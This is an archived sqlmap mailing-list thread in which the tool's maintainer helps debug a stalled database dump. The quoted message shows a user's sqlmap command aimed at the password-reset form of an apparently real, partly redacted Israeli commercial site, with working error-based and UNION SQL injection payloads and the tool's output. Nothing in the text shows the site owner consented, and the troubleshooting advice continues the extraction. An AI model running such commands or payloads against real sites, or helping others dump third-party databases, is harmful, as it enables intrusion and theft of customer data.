Hi.
On Tue, Apr 10, 2012 at 5:00 PM, Daniel Shapira <failsnailtailn...@gmail.com
> wrote:
> Hey guys
> i have a problem here
> take a look
> sqlmap almost always stuck with the message - [WARNING] no proper pivot
> column
> provided (with unique values). It wo
> n't be possible to retrieve all rows
>
This is exactly what it says. As there is no LIMIT/OFFSET mechanism in
MsSQL we use "pivoting" for retrieving data in MsSQL. Unique values for one
column are retrieved while the rest of columns are retrieved through "WHERE
<pivot_column>=current" relation.
> even if i let it run for days it will not dump a thing,
>
People. If sqlmap doesn't dump anything "for minutes" then there is no need
for running it "for days". In those kind of situations options like
--parse-errors or -t traffic.txt are gold.
> sometimes it does retrieve some data put out of 1000 rows it will return
> around
> 10 rows only
>
Is there a way for you to send me privately content of traffic file for
such run (you just have to append --fresh-queries -t traffic.txt to the end
of used commands)
Also, it would be great if you could just try for yourself to run that case
with --no-cast switch and report back if that helped
Kind regards,
Miroslav Stampar
> hope someone can help me with that
> thanks
> Microsoft Windows [Version 6.1.7600]
> Copyright (c) 2009 Microsoft Corporation. All rights reserved.
>
> F:\Users\Dan>cd desktop/sqlmap
>
> F:\Users\Dan\Desktop\sqlmap>sqlmap.py --random-agent -u
> http://www.xxxxxxxx.co.il:80/forgotpass.asp--data="cmdLogin==???&sEmail=1"; -D
> camera4less -T dbo.xxxx -C xxx,xxx,xxx,xxx --dump
>
> sqlmap/1.0-dev (r4976) - automatic SQL injection and database takeover
> tool
> http://www.sqlmap.org
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without prior
> mutual
> consent is illegal. It is the end user's responsibility to obey all
> applicable
> local, state and federal laws. Authors assume no liability and are not
> responsib
> le for any misuse or damage caused by this program
>
> [*] starting at 17:49:12
>
> [17:49:13] [INFO] fetched random HTTP User-Agent header from file
> 'F:\Users\xxx\
> Desktop\sqlmap\txt\user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64;
> en-US) A
> ppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3
> [17:49:13] [INFO] using 'F:\Users\xxx\Desktop\sqlmap\output\www.xxxxx.co.i
> l\session' as session file
> [17:49:13] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from
> sessio
> n file
> [17:49:13] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> reque
> sts:
> ---
> Place: POST
> Parameter: sEmail
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
> clause
> Payload: cmdLogin==???&sEmail=1' AND
> 6043=CONVERT(INT,(CHAR(58)+CHAR(111)+CH
> AR(102)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6043=6043) THEN CHAR(49)
> ELSE CHAR
> (48) END))+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(58))) AND
> 'rxzU'='rxzU
>
> Type: UNION query
> Title: Generic UNION query (NULL) - 2 columns
> Payload: cmdLogin==???&sEmail=1' UNION ALL SELECT
> CHAR(58)+CHAR(111)+CHAR(10
>
> 2)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(79)+CHAR(87)+CHAR(108)+CHAR(111)+CH
>
> AR(87)+CHAR(121)+CHAR(87)+CHAR(90)+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(5
> 8), NULL-- AND 'lpxC'='lpxC
> ---
>
> [17:49:13] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2000
> do you want sqlmap to consider provided column(s):
> [1] as LIKE column names (default)
> [2] as exact column names
> > 2
>
> [17:49:17] [INFO] fetching columns 'xxx, xxx, xxx, xxx' for table 'xxx' in
> database 'xxx'
> [17:49:17] [INFO] the SQL query used returns 4 entries
> [17:49:17] [INFO] resumed: "xxx","varchar"
> [17:49:17] [INFO] resumed: "xxx","varchar"
> [17:49:17] [INFO] resumed: "xxx","varchar"
> [17:49:17] [INFO] resumed: "xxx","varchar"
> [17:49:17] [INFO] fetching entries of column(s) 'xxx, xxx, xxx, xxx' for
> table
> 'purchase' in database 'xxx'
> [17:49:17] [INFO] fetching number of distinct values for column 'xxx'
> [17:49:18] [INFO] fetching number of distinct values for column 'xxx'
> [17:49:18] [INFO] fetching number of distinct values for column 'xxx
> me'
> [17:49:18] [INFO] fetching number of distinct values for column 'xxx'
> [17:49:18] [WARNING] no proper pivot column provided (with unique values).
> It wo
> n't be possible to retrieve all rows
>
>
> ------------------------------------------------------------------------------
> Better than sec? Nothing is better than sec when it comes to
> monitoring Big Data applications. Try Boundary one-second
> resolution app monitoring today. Free.
> http://p.sf.net/sfu/Boundary-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Better than sec? Nothing is better than sec when it comes to
monitoring Big Data applications. Try Boundary one-second
resolution app monitoring today. Free.
http://p.sf.net/sfu/Boundary-dev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
